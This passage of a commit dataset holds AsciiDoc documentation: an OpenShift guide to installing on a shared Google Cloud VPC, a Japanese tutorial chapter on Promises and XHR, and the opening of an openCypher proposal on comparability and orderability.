templates\ninclude::modules\/common-attributes.adoc[]\n:context: installing-gcp-user-infra-vpc\n\ntoc::[]\n\nIn {product-title} version {product-version}, you can install a cluster into a shared Virtual Private Cloud (VPC) on Google Cloud Platform (GCP) that uses infrastructure that you provide. In this context, a cluster installed into a shared VPC is a cluster that is configured to use a VPC from a project different from where the cluster is being deployed. For more information, see Google's documentation on link:https:\/\/cloud.google.com\/vpc\/docs\/shared-vpc#shared_vpc_networks[shared VPC networks].\n\nThe steps for performing a user-provided infrastructure installation into a shared VPC are outlined here. Several\nlink:https:\/\/cloud.google.com\/deployment-manager\/docs[Deployment Manager] templates are provided to assist in\ncompleting these steps or to help model your own. 
You are also free to create\nthe required resources through other methods.\n\n[IMPORTANT]\n====\nThe steps for performing a user-provisioned infrastructure installation are provided as an example only. Installing a cluster with infrastructure you provide requires knowledge of the cloud provider and the installation process of {product-title}. Several Deployment Manager templates are provided to assist in completing these steps or to help model your own. You are also free to create the required resources through other methods; the templates are just an example.\n====\n\n== Prerequisites\n\n* Review details about the\nxref:..\/..\/architecture\/architecture-installation.adoc#architecture-installation[{product-title} installation and update]\nprocesses.\n* If you use a firewall and plan to use telemetry, you must\nxref:..\/..\/installing\/install_config\/configuring-firewall.adoc#configuring-firewall[configure the firewall to allow the sites] that your cluster requires access to.\n* If you do not allow the system to manage identity and access management (IAM),\nthen a cluster administrator can\nxref:..\/..\/installing\/installing_gcp\/manually-creating-iam-gcp.adoc#manually-creating-iam-gcp[manually\ncreate and maintain IAM credentials]. Manual mode can also be used in\nenvironments where the cloud IAM APIs are not reachable.\n+\n[NOTE]\n====\nBe sure to also review this site list if you are configuring a proxy.\n====\n\n[id=\"csr-management-gcp-vpc\"]\n== Certificate signing requests management\n\nBecause your cluster has limited access to automatic machine management when you\nuse infrastructure that you provision, you must provide a mechanism for approving\ncluster certificate signing requests (CSRs) after installation. The\n`kube-controller-manager` only approves the kubelet client CSRs. The\n`machine-approver` cannot guarantee the validity of a serving certificate\nthat is requested by using kubelet credentials because it cannot confirm that\nthe correct machine issued the request. 
You must determine and implement a\nmethod of verifying the validity of the kubelet serving certificate requests\nand approving them.\n\n[id=\"installation-gcp-user-infra-config-project-vpc\"]\n== Configuring the GCP project that hosts your cluster\n\nBefore you can install {product-title}, you must configure a Google Cloud\nPlatform (GCP) project to host it.\n\ninclude::modules\/installation-gcp-project.adoc[leveloffset=+2]\ninclude::modules\/installation-gcp-enabling-api-services.adoc[leveloffset=+2]\ninclude::modules\/installation-gcp-limits.adoc[leveloffset=+2]\ninclude::modules\/installation-gcp-service-account.adoc[leveloffset=+2]\ninclude::modules\/installation-gcp-permissions.adoc[leveloffset=+3]\ninclude::modules\/installation-gcp-regions.adoc[leveloffset=+2]\ninclude::modules\/installation-gcp-install-cli.adoc[leveloffset=+2]\n\ninclude::modules\/installation-gcp-user-infra-config-host-project-vpc.adoc[leveloffset=+1]\ninclude::modules\/installation-gcp-dns.adoc[leveloffset=+2]\ninclude::modules\/installation-creating-gcp-vpc.adoc[leveloffset=+2]\ninclude::modules\/installation-deployment-manager-vpc.adoc[leveloffset=+3]\n\ninclude::modules\/installation-user-infra-generate.adoc[leveloffset=+1]\n\ninclude::modules\/installation-initializing-manual.adoc[leveloffset=+2]\n\ninclude::modules\/installation-gcp-user-infra-shared-vpc-config-yaml.adoc[leveloffset=+2]\n\ninclude::modules\/installation-configure-proxy.adoc[leveloffset=+2]\n\n\/\/include::modules\/installation-three-node-cluster.adoc[leveloffset=+2]\n\ninclude::modules\/installation-user-infra-generate-k8s-manifest-ignition.adoc[leveloffset=+2]\n.Additional resources\n\n[id=\"installation-gcp-user-infra-exporting-common-variables-vpc\"]\n== Exporting common variables\n\ninclude::modules\/installation-extracting-infraid.adoc[leveloffset=+2]\ninclude::modules\/installation-user-infra-exporting-common-variables.adoc[leveloffset=+2]\n\ninclude::modules\/installation-creating-gcp-lb.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-ext-lb.adoc[leveloffset=+2]\ninclude::modules\/installation-deployment-manager-int-lb.adoc[leveloffset=+2]\n\ninclude::modules\/installation-creating-gcp-private-dns.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-private-dns.adoc[leveloffset=+2]\n\ninclude::modules\/installation-creating-gcp-firewall-rules-vpc.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-firewall-rules.adoc[leveloffset=+2]\n\ninclude::modules\/installation-creating-gcp-iam-shared-vpc.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-iam-shared-vpc.adoc[leveloffset=+2]\n\ninclude::modules\/installation-gcp-user-infra-rhcos.adoc[leveloffset=+1]\n\ninclude::modules\/installation-creating-gcp-bootstrap.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-bootstrap.adoc[leveloffset=+2]\n\ninclude::modules\/installation-creating-gcp-control-plane.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-control-plane.adoc[leveloffset=+2]\n\ninclude::modules\/installation-gcp-user-infra-wait-for-bootstrap.adoc[leveloffset=+1]\n\ninclude::modules\/installation-creating-gcp-worker.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-worker.adoc[leveloffset=+2]\n\ninclude::modules\/cli-installing-cli.adoc[leveloffset=+1]\n\ninclude::modules\/cli-logging-in-kubeadmin.adoc[leveloffset=+1]\n\ninclude::modules\/installation-approve-csrs.adoc[leveloffset=+1]\n\ninclude::modules\/installation-gcp-user-infr
a-adding-ingress.adoc[leveloffset=+1]\n\n[id=\"installation-gcp-user-infra-vpc-adding-firewall-rules\"]\n== Adding ingress firewall rules\nThe cluster requires several firewall rules. If you do not use a shared VPC, these rules are created by the ingress controller via the GCP cloud provider. When you use a shared VPC, you can either create cluster-wide firewall rules for all services now or create each rule based on events, when the cluster requests access. By creating each rule when the cluster requests access, you know exactly which firewall rules are required. By creating cluster-wide firewall rules, you can apply the same rule set across multiple clusters.\n\nIf you choose to create each rule based on events, you must create firewall rules after you provision the cluster and during the life of the cluster when the console notifies you that rules are missing. Events that are similar to the following event are displayed, and you must add the firewall rules that are required:\n\n[source,terminal]\n----\n$ oc get events -n openshift-ingress --field-selector=\"reason=LoadBalancerManualChange\"\n----\n\n.Example output\n[source,terminal]\n----\nFirewall change required by security admin: `gcloud compute firewall-rules create k8s-fw-a26e631036a3f46cba28f8df67266d55 --network example-network --description \"{\\\"kubernetes.io\/service-name\\\":\\\"openshift-ingress\/router-default\\\", \\\"kubernetes.io\/service-ip\\\":\\\"35.237.236.234\\\"}\\\" --allow tcp:443,tcp:80 --source-ranges 0.0.0.0\/0 --target-tags exampl-fqzq7-master,exampl-fqzq7-worker --project example-project`\n----\n\nIf you encounter issues when creating these rule-based events, you can configure the cluster-wide firewall rules while your cluster is running.\n\ninclude::modules\/installation-creating-gcp-shared-vpc-cluster-wide-firewall-rules.adoc[leveloffset=+2]\n\n\/\/include::modules\/installation-creating-gcp-shared-vpc-ingress-firewall-rules.adoc[leveloffset=+1]\n\ninclude::modules\/installation-gcp-user-infra-completing.adoc[leveloffset=+1]\n\n== Next steps\n\n* xref:..\/..\/post_installation_configuration\/cluster-tasks.adoc#available_cluster_customizations[Customize your cluster].\n* If necessary, you can\nxref:..\/..\/support\/remote_health_monitoring\/opting-out-of-remote-health-reporting.adoc#opting-out-remote-health-reporting_opting-out-remote-health-reporting[opt out of remote health reporting].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a6d3af29e3081f0bb21c8ed0232d73633f68d781","subject":"chore(promise-and-array): \u6587\u7ae0\u306e\u7e4b\u304c\u308a\u304c\u60aa\u304f\u306a\u3063\u305f\u306e\u3092\u4fee\u6b63","message":"chore(promise-and-array): 
\u6587\u7ae0\u306e\u7e4b\u304c\u308a\u304c\u60aa\u304f\u306a\u3063\u305f\u306e\u3092\u4fee\u6b63\n","repos":"purepennons\/promises-book,liyunsheng\/promises-book,cqricky\/promises-book,azu\/promises-book,liyunsheng\/promises-book,xifeiwu\/promises-book,wangwei1237\/promises-book,charlenopires\/promises-book,mzbac\/promises-book,oToUC\/promises-book,genie88\/promises-book,purepennons\/promises-book,wenber\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,azu\/promises-book,dieface\/promises-book,genie88\/promises-book,charlenopires\/promises-book,wenber\/promises-book,liubin\/promises-book,charlenopires\/promises-book,dieface\/promises-book,xifeiwu\/promises-book,wangwei1237\/promises-book,liubin\/promises-book,cqricky\/promises-book,azu\/promises-book,wenber\/promises-book,xifeiwu\/promises-book,sunfurong\/promise,lidasong2014\/promises-book,liubin\/promises-book,azu\/promises-book,tangjinzhou\/promises-book,mzbac\/promises-book,wangwei1237\/promises-book,cqricky\/promises-book,lidasong2014\/promises-book,liyunsheng\/promises-book,purepennons\/promises-book,oToUC\/promises-book,mzbac\/promises-book,oToUC\/promises-book,genie88\/promises-book,tangjinzhou\/promises-book,sunfurong\/promise,tangjinzhou\/promises-book,sunfurong\/promise","old_file":"Ch2_HowToWrite\/promise-and-array.adoc","new_file":"Ch2_HowToWrite\/promise-and-array.adoc","new_contents":"[[ch2-promise-and-array]]\n== Promise\u3068\u914d\u5217\n\n\u3053\u3053\u307e\u3067\u3067\u3001promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304c FulFilled \u307e\u305f\u306f Rejected \u3068\u306a\u3063\u305f\u6642\u306e\u51e6\u7406\u306f <<promise.then,`.then`>> \u3068 <<promise.catch,`.catch`>> \u3067\u767b\u9332\u51fa\u6765\u308b\u4e8b\u3092\u5b66\u3073\u307e\u3057\u305f\u3002\n\n\u4e00\u3064\u306epromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306a\u3089\u3001\u305d\u306epromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306b\u5bfe\u3057\u3066\u51e6\u7406\u3092\u66f8\u3051\u3070\u826f\u3044\u3067\u3059\u304c\u3001\n\u8907\u6570\u306epromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304c\u5168\u3066FulFilled\u3068\u306a\u3063\u305f\u6642\u306e\u51e6\u7406\u3092\u66f8\u304f\u5834\u5408\u306f\u3069\u3046\u3059\u308c\u3070\u3088\u3044\u3067\u3057\u3087\u3046\u304b?\n\n\u4f8b\u3048\u3070\u3001A->B->C \u3068\u3044\u3046\u611f\u3058\u3067\u8907\u6570\u306eXHR(\u975e\u540c\u671f\u51e6\u7406)\u3092\u884c\u3063\u305f\u5f8c\u306b\u3001\u4f55\u304b\u3092\u3057\u305f\u3044\u3068\u3044\u3046\u4e8b\u4f8b\u3092\u8003\u3048\u3066\u307f\u307e\u3059\u3002\n\n\u3061\u3087\u3063\u3068\u30a4\u30e1\u30fc\u30b8\u3057\u306b\u304f\u3044\u306e\u3067\u3001\n\u307e\u305a\u306f\u3001\u901a\u5e38\u306e\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb\u3092\u4f7f\u3063\u3066\u8907\u6570\u306eXHR\u3092\u884c\u3046\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u30b3\u30fc\u30c9\u3092\u898b\u3066\u307f\u307e\u3059\u3002\n\n=== \u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u3067\u8907\u6570\u306e\u975e\u540c\u671f\u51e6\u7406\n\n[source,js]\n[[multiple-xhr-callback.js]]\n.multiple-xhr-callback.js\n----\ninclude::embed\/embed-multiple-xhr-callback.js[]\n----\n\n\u4e0a\u8a18\u306e\u30b3\u30fc\u30c9\u3092\u5b9f\u969b\u306b\u5b9f\u884c\u3057\u3066\u3001XHR\u3067\u53d6\u5f97\u3057\u305f\u7d50\u679c\u3092\u5f97\u308b\u306b\u306f\u6b21\u306e\u3088\u3046\u306b\u306a\u308b\u3068\u601d\u3044\u307e\u3059\u3002\n\n[source,js]\n----\nmain(function(error, results){\n 
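\/\/ results: the values fetched by the XHRs\n 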
console.log(results);\n});\n----\n\n\u3053\u306e\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb\u3067\u306f\u5e7e\u3064\u304b\u306e\u8981\u7d20\u304c\u51fa\u3066\u304d\u307e\u3059\u3002\n\n* `JSON.parse` \u3092\u305d\u306e\u307e\u307e\u4f7f\u3046\u3068\u4f8b\u5916\u3068\u306a\u308b\u30b1\u30fc\u30b9\u304c\u3042\u308b\u305f\u3081\u30e9\u30c3\u30d7\u3057\u305f`jsonParse`\u95a2\u6570\u3092\u4f7f\u3046\n* \u8907\u6570\u306eXHR\u3092\u305d\u306e\u307e\u307e\u66f8\u304f\u3068\u30cd\u30b9\u30c8\u304c\u6df1\u304f\u306a\u308b\u305f\u3081\u3001`allRequest`\u3068\u3044\u3046request\u95a2\u6570\u3092\u5b9f\u884c\u3059\u308b\u3082\u306e\u3092\u5229\u7528\u3059\u308b\n* \u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u95a2\u6570\u306b\u306f `callback(error,value)` \u3068\u3044\u3046Node.js\u3067\u3088\u304f\u898b\u3089\u308c\u308b\u5f15\u6570\u3092\u6e21\u3059\n\n`jsonParse` \u95a2\u6570\u3092\u4f7f\u3046\u3068\u304d\u306b `bind` \u3092\u4f7f\u3046\u3053\u3068\u3067\u3001\u90e8\u5206\u9069\u5fdc\u3092\u4f7f\u3063\u3066\u7121\u540d\u95a2\u6570\u3092\u6e1b\u3089\u3059\u3088\u3046\u306b\u3057\u3066\u3044\u307e\u3059\u3002\n(\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb\u3067\u3082\u95a2\u6570\u306e\u51e6\u7406\u306a\u3069\u3092\u3061\u3083\u3093\u3068\u5206\u96e2\u3059\u308c\u3070\u3001\u7121\u540d\u95a2\u6570\u306e\u4f7f\u7528\u3082\u6e1b\u3089\u305b\u308b\u3068\u601d\u3044\u307e\u3059)\n\n[source,js]\n----\njsonParse.bind(null, callback);\n\/\/ \u306f\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u7f6e\u304d\u63db\u3048\u308b\u306e\u3068\u6b86\u3069\u540c\u3058\nfunction(error,value){\n jsonParse(callback, error, value);\n}\n----\n\n\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb\u3067\u66f8\u3044\u305f\u3082\u306e\u3092\u898b\u308b\u3068\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u70b9\u304c\u6c17\u306b\u306a\u308a\u307e\u3059\u3002\n\n* \u660e\u793a\u7684\u306a\u4f8b\u5916\u306e\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u304c\u5fc5\u8981\n* \u30cd\u30b9\u30c8\u3092\u6df1\u304f\u3057\u306a\u3044\u305f\u3081\u306b\u3001request\u3092\u6271\u3046\u95a2\u6570\u304c\u5fc5\u8981\n* \u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u304c\u305f\u304f\u3055\u3093\u3067\u3066\u304f\u308b\n\n\u6b21\u306f\u3001`Promise#then` \u3092\u4f7f\u3063\u3066\u540c\u69d8\u306e\u4e8b\u3092\u3057\u3066\u307f\u305f\u3044\u3068\u601d\u3044\u307e\u3059\u3002\n\n=== Promise#then\u306e\u307f\u3067\u8907\u6570\u306e\u975e\u540c\u671f\u51e6\u7406\n\n\u5148\u306b\u8ff0\u3079\u3066\u304a\u304d\u307e\u3059\u304c\u3001`Promise.all` \u3068\u3044\u3046\u3053\u306e\u3088\u3046\u306a\u51e6\u7406\u306b\u9069\u5207\u306a\u3082\u306e\u304c\u3042\u308b\u305f\u3081\u3001\n\u30ef\u30b6\u3068 `.then`\u306e\u90e8\u5206\u3092\u30af\u30c9\u304f\u66f8\u3044\u3066\u3044\u307e\u3059\u3002\n\n<<promise.then,`.then`>> \u3092\u4f7f\u3063\u305f\u5834\u5408\u306f\u3001\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb\u3068\u5b8c\u5168\u306b\u540c\u7b49\u3068\u3044\u3046\u308f\u3051\u3067\u306f\u306a\u3044\u3067\u3059\u304c\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u66f8\u3051\u308b\u3068\u601d\u3044\u307e\u3059\u3002\n\n[source,js]\n[[multiple-xhr.js]]\n----\ninclude::embed\/embed-multiple-xhr.js[]\n----\n\n\u4e0a\u8a18\u306e\u30b3\u30fc\u30c9\u3092\u5b9f\u969b\u306b\u5b9f\u884c\u3057\u3066\u3001XHR\u3067\u53d6\u5f97\u3057\u305f\u7d50\u679c\u3092\u5f97\u308b\u306b\u306f\u6b21\u306e\u3088\u3046\u306b\u306a\u308b\u3068\u601d\u3044\u307e\u3059\u3002\n\n[source,js]\n----\nmain().then(function (value) {\n console.log(value);\n}).catch(function(error){\n 
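\/\/ any rejection in the chain is handled here\n 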
console.log(error);\n});\n----\n\n<<multiple-xhr-callback.js, \u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb>>\u3068\u6bd4\u8f03\u3057\u3066\u307f\u308b\u3068\u6b21\u306e\u4e8b\u304c\u308f\u304b\u308a\u307e\u3059\u3002\n\n* `JSON.parse` \u3092\u305d\u306e\u307e\u307e\u4f7f\u3063\u3066\u3044\u308b\n* `main()` \u306fpromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3057\u3066\u3044\u308b\n* \u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u306f\u8fd4\u3063\u3066\u304d\u305fpromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306b\u5bfe\u3057\u3066\u66f8\u3044\u3066\u3044\u308b\n\n\u5148\u307b\u3069\u3082\u8ff0\u3079\u305f\u3088\u3046\u306b main\u306e `then` \u306e\u90e8\u5206\u304c\u30af\u30c9\u304f\u611f\u3058\u307e\u3059\u3002\n\n\u3053\u306e\u3088\u3046\u306a\u8907\u6570\u306e\u975e\u540c\u671f\u51e6\u7406\u3092\u307e\u3068\u3081\u3066\u6271\u3046 `Promise.all` \u3068 `Promise.race` \u3068\u3044\u3046\u9759\u7684\u30e1\u30bd\u30c3\u30c9\u306b\u3064\u3044\u3066\n\u5b66\u3093\u3067\u3044\u304d\u307e\u3057\u3087\u3046\u3002","old_contents":"[[ch2-promise-and-array]]\n== Promise\u3068\u914d\u5217\n\n\u5148\u307b\u3069\u306e\u7ae0\u3067\u306f\u3001promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304cresolve\u53c8\u306freject\u3055\u308c\u305f\u6642\u306e\u51e6\u7406\u306f <<promise.then,`.then`>> \u3068 <<promise.catch,`.catch`>> \u3092\n\u4f7f\u3046\u3053\u3068\u3067\u884c\u3048\u308b\u4e8b\u3092\u5b66\u3073\u307e\u3057\u305f\u3002\n\n\u4e00\u3064\u306epromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306a\u3089\u3001\u305d\u306epromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306b\u5bfe\u3057\u3066\u51e6\u7406\u3092\u66f8\u3051\u3070\u826f\u3044\u3067\u3059\u304c\u3001\n\u8907\u6570\u306epromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306b\u51e6\u7406\u3092\u66f8\u304f\u5834\u5408\u306f\u3069\u3046\u3059\u308c\u3070\u3088\u3044\u3067\u3057\u3087\u3046\u304b?\n\n\u4f8b\u3048\u3070\u3001A->B->C \u3068\u3044\u3046\u611f\u3058\u3067\u8907\u6570\u306eXHR(\u975e\u540c\u671f\u51e6\u7406)\u3092\u884c\u3063\u305f\u5f8c\u306b\u3001\u4f55\u304b\u3092\u3057\u305f\u3044\u3068\u3044\u3046\u4e8b\u4f8b\u3092\u8003\u3048\u3066\u307f\u307e\u3059\u3002\n\n\u3061\u3087\u3063\u3068\u30a4\u30e1\u30fc\u30b8\u3057\u306b\u304f\u3044\u306e\u3067\u3001\n\u307e\u305a\u306f\u3001\u901a\u5e38\u306e\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb\u3092\u4f7f\u3063\u3066\u8907\u6570\u306eXHR\u3092\u884c\u3046\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u30b3\u30fc\u30c9\u3092\u898b\u3066\u307f\u307e\u3059\u3002\n\n=== \u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u3067\u8907\u6570\u306e\u975e\u540c\u671f\u51e6\u7406\n\n[source,js]\n[[multiple-xhr-callback.js]]\n.multiple-xhr-callback.js\n----\ninclude::embed\/embed-multiple-xhr-callback.js[]\n----\n\n\u4e0a\u8a18\u306e\u30b3\u30fc\u30c9\u3092\u5b9f\u969b\u306b\u5b9f\u884c\u3057\u3066\u3001XHR\u3067\u53d6\u5f97\u3057\u305f\u7d50\u679c\u3092\u5f97\u308b\u306b\u306f\u6b21\u306e\u3088\u3046\u306b\u306a\u308b\u3068\u601d\u3044\u307e\u3059\u3002\n\n[source,js]\n----\nmain(function(error, results){\n console.log(results);\n});\n----\n\n\u3053\u306e\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb\u3067\u306f\u5e7e\u3064\u304b\u306e\u8981\u7d20\u304c\u51fa\u3066\u304d\u307e\u3059\u3002\n\n* `JSON.parse` \u3092\u305d\u306e\u307e\u307e\u4f7f\u3046\u3068\u4f8b\u5916\u3068\u306a\u308b\u30b1\u30fc\u30b9\u304c\u3042\u308b\u305f\u3081\u30e9\u30c3\u30d7\u3057\u305f`jsonParse`\u95a2\u6570\u3092\u4f7f\u3046\n* 
\u8907\u6570\u306eXHR\u3092\u305d\u306e\u307e\u307e\u66f8\u304f\u3068\u30cd\u30b9\u30c8\u304c\u6df1\u304f\u306a\u308b\u305f\u3081\u3001`allRequest`\u3068\u3044\u3046request\u95a2\u6570\u3092\u5b9f\u884c\u3059\u308b\u3082\u306e\u3092\u5229\u7528\u3059\u308b\n* \u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u95a2\u6570\u306b\u306f `callback(error,value)` \u3068\u3044\u3046Node.js\u3067\u3088\u304f\u898b\u3089\u308c\u308b\u5f15\u6570\u3092\u6e21\u3059\n\n`jsonParse` \u95a2\u6570\u3092\u4f7f\u3046\u3068\u304d\u306b `bind` \u3092\u4f7f\u3046\u3053\u3068\u3067\u3001\u90e8\u5206\u9069\u5fdc\u3092\u4f7f\u3063\u3066\u7121\u540d\u95a2\u6570\u3092\u6e1b\u3089\u3059\u3088\u3046\u306b\u3057\u3066\u3044\u307e\u3059\u3002\n(\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb\u3067\u3082\u95a2\u6570\u306e\u51e6\u7406\u306a\u3069\u3092\u3061\u3083\u3093\u3068\u5206\u96e2\u3059\u308c\u3070\u3001\u7121\u540d\u95a2\u6570\u306e\u4f7f\u7528\u3082\u6e1b\u3089\u305b\u308b\u3068\u601d\u3044\u307e\u3059)\n\n[source,js]\n----\njsonParse.bind(null, callback);\n\/\/ \u306f\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u7f6e\u304d\u63db\u3048\u308b\u306e\u3068\u6b86\u3069\u540c\u3058\nfunction(error,value){\n jsonParse(callback, error, value);\n}\n----\n\n\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb\u3067\u66f8\u3044\u305f\u3082\u306e\u3092\u898b\u308b\u3068\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u70b9\u304c\u6c17\u306b\u306a\u308a\u307e\u3059\u3002\n\n* \u660e\u793a\u7684\u306a\u4f8b\u5916\u306e\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u304c\u5fc5\u8981\n* \u30cd\u30b9\u30c8\u3092\u6df1\u304f\u3057\u306a\u3044\u305f\u3081\u306b\u3001request\u3092\u6271\u3046\u95a2\u6570\u304c\u5fc5\u8981\n* \u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u304c\u305f\u304f\u3055\u3093\u3067\u3066\u304f\u308b\n\n\u6b21\u306f\u3001`Promise#then` \u3092\u4f7f\u3063\u3066\u540c\u69d8\u306e\u4e8b\u3092\u3057\u3066\u307f\u305f\u3044\u3068\u601d\u3044\u307e\u3059\u3002\n\n=== Promise#then\u306e\u307f\u3067\u8907\u6570\u306e\u975e\u540c\u671f\u51e6\u7406\n\n\u5148\u306b\u8ff0\u3079\u3066\u304a\u304d\u307e\u3059\u304c\u3001`Promise.all` \u3068\u3044\u3046\u3053\u306e\u3088\u3046\u306a\u51e6\u7406\u306b\u9069\u5207\u306a\u3082\u306e\u304c\u3042\u308b\u305f\u3081\u3001\n\u30ef\u30b6\u3068 `.then`\u306e\u90e8\u5206\u3092\u30af\u30c9\u304f\u66f8\u3044\u3066\u3044\u307e\u3059\u3002\n\n<<promise.then,`.then`>> \u3092\u4f7f\u3063\u305f\u5834\u5408\u306f\u3001\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb\u3068\u5b8c\u5168\u306b\u540c\u7b49\u3068\u3044\u3046\u308f\u3051\u3067\u306f\u306a\u3044\u3067\u3059\u304c\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u66f8\u3051\u308b\u3068\u601d\u3044\u307e\u3059\u3002\n\n[source,js]\n[[multiple-xhr.js]]\n----\ninclude::embed\/embed-multiple-xhr.js[]\n----\n\n\u4e0a\u8a18\u306e\u30b3\u30fc\u30c9\u3092\u5b9f\u969b\u306b\u5b9f\u884c\u3057\u3066\u3001XHR\u3067\u53d6\u5f97\u3057\u305f\u7d50\u679c\u3092\u5f97\u308b\u306b\u306f\u6b21\u306e\u3088\u3046\u306b\u306a\u308b\u3068\u601d\u3044\u307e\u3059\u3002\n\n[source,js]\n----\nmain().then(function (value) {\n console.log(value);\n}).catch(function(error){\n console.log(error);\n});\n----\n\n<<multiple-xhr-callback.js, \u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb>>\u3068\u6bd4\u8f03\u3057\u3066\u307f\u308b\u3068\u6b21\u306e\u4e8b\u304c\u308f\u304b\u308a\u307e\u3059\u3002\n\n* `JSON.parse` \u3092\u305d\u306e\u307e\u307e\u4f7f\u3063\u3066\u3044\u308b\n* `main()` \u306fpromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3057\u3066\u3044\u308b\n* 
\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u306f\u8fd4\u3063\u3066\u304d\u305fpromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306b\u5bfe\u3057\u3066\u66f8\u3044\u3066\u3044\u308b\n\n\u5148\u307b\u3069\u3082\u8ff0\u3079\u305f\u3088\u3046\u306b main\u306e `then` \u306e\u90e8\u5206\u304c\u30af\u30c9\u304f\u611f\u3058\u307e\u3059\u3002\n\n\u3053\u306e\u3088\u3046\u306a\u8907\u6570\u306e\u975e\u540c\u671f\u51e6\u7406\u3092\u307e\u3068\u3081\u3066\u6271\u3046 `Promise.all` \u3068 `Promise.race` \u3068\u3044\u3046\u9759\u7684\u30e1\u30bd\u30c3\u30c9\u306b\u3064\u3044\u3066\n\u5b66\u3093\u3067\u3044\u304d\u307e\u3057\u3087\u3046\u3002","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"880d71700ee6b4d80ce94568d94bb2dc8f20c9f1","subject":"Addressed feedback; also aligned comparability and orderability with each other to simplify the mental model","message":"Addressed feedback; also aligned comparability and orderability with each other to simplify the mental model\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2016-06-14-Comparability-and-orderability.adoc","new_file":"cip\/CIP2016-06-14-Comparability-and-orderability.adoc","new_contents":"= CIP2016-06-14 - Comparability and Orderability\n:numbered:\n:toc:\n:toc-placement: macro\n:source-highlighter: codemirror\n\n*Author:* Mats Rydberg <mats@neotechnology.com>, Stefan Plantikow <stefan.plantikow@neotechnology.com>\n\n[abstract]\n.Abstract\n--\nThis CIP intends to introduce and formalise two new concepts, *orderability* and *comparability*, and defines their relationship to the already existing concepts of *equality* and *equivalence*.\nOrderability revolves around the `ORDER BY` clause, and defines the semantics it needs to be able to properly sort values passed to it.\nComparability revolves around the inequality operators (`>`, `<`, `>=`, `<=`), and defines the semantics they need to properly determine how two values compare to each other.\nIn order to get a consistent set of rules, we are proposing some changes to how Cypher defines these concepts.\n--\n\ntoc::[]\n\n\n== Motivation\n\nThere are currently a number of limitations and inconsistencies that this CIP will try to fix.\n\n- `ORDER BY` will fail with an error if the values passed to it have different types.\n- Various inconsistencies around equality semantics as exposed by `IN`, `=`, `DISTINCT`, and grouping\n- Unclear relationship between comparison operators, equality, and `ORDER BY`\n\nThe difference between equality and equivalence in Cypher today is small and subtle, and limited to testing two instances of the value `null` to each other.\n\n- In equality, `null = null` is `null`\n- In equivalence, used by grouping and `DISTINCT`, instances of `null` are treated as being the same value\n\nThis proposal aims to increase the difference between these two concepts, by making lists containing `null` values follow the same difference as the `null` values themselves.\n\n== Proposal\n\nCurrently, Cypher has good semantics for equality within the primitive types (booleans, strings, integers, and floats) and maps.\nFurthermore, Cypher has good semantics for comparability and orderability for integers, floats, and strings, within the types.\nBetween different types, however, the comparability is undefined, which is something we regard as a problem for certain combinations of values and types. 
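For instance, a cross-type comparison such as\n\n[source, cypher]\n----\nRETURN 1 < 'one' \/\/ no defined result today\n----\n\nhas no well-defined outcome (the snippet is illustrative). 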
